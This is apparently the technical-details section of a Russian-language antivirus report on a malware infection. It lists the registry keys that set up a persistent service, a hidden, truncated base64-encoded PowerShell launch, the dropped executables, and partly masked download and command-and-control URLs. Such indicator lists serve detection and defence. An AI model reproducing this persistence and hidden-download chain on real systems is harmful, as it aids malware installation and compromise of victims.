Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\querywce] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\querywce] 'ImagePath' = '"%WINDIR%\SysWOW64\querywce.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...
- %HOMEPATH%\469.exe
- %HOMEPATH%\469.exe в %WINDIR%\syswow64\querywce.exe
- http://aq###uore.com/wp-admin/z7z8-u7hfr-511/
- http://81.###.253.80:443/fsPmUsAQO via 81.##4.253.80
- DNS ASK aq###uore.com
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\querywce.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...' (со скрытым окном)